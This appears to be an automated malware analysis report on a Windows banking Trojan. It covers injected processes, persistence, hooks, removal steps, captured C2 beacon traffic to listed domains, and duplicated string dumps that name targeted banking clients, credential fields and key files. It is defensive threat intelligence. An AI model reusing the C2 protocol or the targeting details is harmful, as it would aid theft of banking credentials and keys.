HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.FKP.1 (B) (Emsisoft), Gen:Heur.FKP.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8911d934d6ca504d3190ced1e6cef620
SHA1: 0d231a66d3a2c7a0d52e600212da69b4c66ef978
SHA256: 2e1af36b1e793331e01f44f1f4cd31403c78da692bbbb6e3a477a983318c1cda
SSDeep: 6144:jvZR8D2L mqP/lH8nNnlfttDkJsZLX0tTMPd:jvZiqL mUwXTIoLX0tgPd
Size: 242176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1990-09-29 10:35:11
Analyzed on: WindowsXP SP3 32-bit
Summary: Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1860
The Trojan injects its code into the following process(es):
winlogon.exe:716
svchost.exe:932
svchost.exe:1012
svchost.exe:1100
svchost.exe:1144
svchost.exe:1184
Explorer.EXE:1988
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\fciniiq.exe (1765 bytes)
%System%\config\software (2440 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B2.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 89 EE A3 31 62 09 5B 40 B0 C1 8E 6F A7 13 3F"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\fciniiq.exe_, \??\%WinDir%\apppatch\fciniiq.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöDúz=º«H$YÉòd¼Œ¤Kô1,Å $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€ÂÂÂÂ\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂÂkDùâ€ÂÂaâ€ÂÂ*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÂÄZ¡r»ôâ€ÂÂ)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÂÃÂÂ=éÃâ€ÂÑщ¬q9|áÃÂÂù’‘ÃÂÂéšÄRa8a67a25"
Dropped PE files
| MD5 | File path |
|---|---|
| 0f5123686dfac9f721db41b5ea118008 | c:\WINDOWS\AppPatch\fciniiq.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in USER32.dll:
GetClipboardData
SetThreadDesktop
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ntdll.dll:
RtlGetNativeSystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1860
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\fciniiq.exe (1765 bytes)
%System%\config\software (2440 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: COMODO
Product Name: nonchampion
Product Version: 9.8.4.6
Legal Copyright: Humbuggery
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.4.7.4
File Description: pedantesque
Comments:
Language: Language Neutral
Company Name: COMODOProduct Name: nonchampionProduct Version: 9.8.4.6Legal Copyright: HumbuggeryLegal Trademarks: Original Filename: Internal Name: File Version: 5.4.7.4File Description: pedantesqueComments: Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .U | 4096 | 6947 | 7168 | 3.99356 | e93a8ae2034243c9b8422ebbfd309300 |
| .jC | 12288 | 166942 | 4608 | 4.85153 | 54713715ccbe98ff54ecfa15c0cbc6d4 |
| .LRK | 180224 | 90088 | 1536 | 4.69441 | cdeca549491caaeba98cab10357d3f04 |
| .g | 270336 | 498303 | 3584 | 4.67826 | acb72dd387a3fc5961614ae228b5463e |
| .ucKPZR | 770048 | 94461 | 94720 | 5.53794 | fd9be9e20d98a7490f7ca99ad0b13844 |
| .pWz | 868352 | 12800 | 12800 | 4.21382 | 546c3e68f9c154010a3551ceb16e948a |
| .o | 884736 | 3927 | 3584 | 3.48286 | 5f4083c2c44a4a3a9232a0d028ebc49e |
| .sjcOq | 888832 | 90165 | 90624 | 5.54027 | a9238e0770dc210b24a92bb9621b1385 |
| .an | 983040 | 386780 | 12800 | 4.76446 | 01e3c775db3a528650d2a0521dca22e0 |
| .l | 1372160 | 49335 | 2048 | 2.88781 | 44aebcaa03a0f19eaacca1d88d5e3336 |
| .rsrc | 1425408 | 6412 | 6656 | 3.1793 | 71ac31230fcc31b9d8fba73ee7d38a52 |
| .reloc | 1433600 | 1024 | 1024 | 4.59015 | 8951cd57234c578ab632d8739a0d65b4 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
0c1094311291df761804f2297274e1ed
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://vocyzit.com/login.php | 69.195.129.70 |
| hxxp://vojyqem.com/login.php | 198.74.50.135 |
| hxxp://qetyfuv.com/login.php | 141.8.225.80 |
| hxxp://gatyfus.com/login.php | 86.124.164.25 |
| hxxp://vowydef.com/login.php | 166.78.144.80 |
| hxxp://qekyqop.com/login.php | 107.20.253.26 |
| hxxp://lymysan.com/login.php | 94.126.178.29 |
| hxxp://qetyvep.com/login.php | 109.74.196.143 |
| hxxp://purycap.com/login.php | 193.166.255.171 |
| vonyzuf.com | 141.8.225.80 |
| pumyxiv.com | 198.74.50.135 |
| puzywel.com | 198.74.50.135 |
| vofygum.com | 141.8.225.80 |
| gadyniw.com | 109.74.196.143 |
| lysynur.com | 141.8.225.80 |
| qegyhig.com | 198.74.50.135 |
| gadyfuh.com | 141.8.225.80 |
| puvyxil.com | 198.74.50.135 |
| pumypog.com | 198.74.50.135 |
| galyqaz.com | 198.74.50.135 |
| qeqysag.com | 198.74.50.135 |
| puvytuq.com | 198.74.50.135 |
| vocyruk.com | 141.8.225.80 |
| puzylyp.com | 109.74.196.143 |
| lygygin.com | 198.74.50.135 |
| volykyc.com | 198.74.50.135 |
| www.bing.com | 204.79.197.200 |
| lysyfyj.com | 198.74.50.135 |
| pufygug.com | 198.74.50.135 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekyqop.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 19:28:06 GMT
Connection: close
Cache-Control: private, no-cache, no-store, max-age=0
Expires: Mon, 01 Jan 1990 0:00:00 GMT
X-Frame-Options: DENY
<<< skipped >>>
Server: nginx/1.6.0
Date: Fri, 15 Aug 2014 22:27:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4
Connection: close'OK'..
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vowydef.com
Content-Length: 9
Pragma: no-cache
....~7.~'HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 19:28:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Content-Length: 9
Pragma: no-cache
....~7.~'HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Fri, 15 Aug 2014 19:28:09 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 0
Connection: close
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymysan.com
Content-Length: 9
Pragma: no-cache
....~7.~'HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 15 Aug 2014 19:28:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.15-1~dotdeb.2
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
winlogon.exe_716_rwx_01940000_000B4000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
winlogon.exe_716_rwx_01C70000_000C3000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
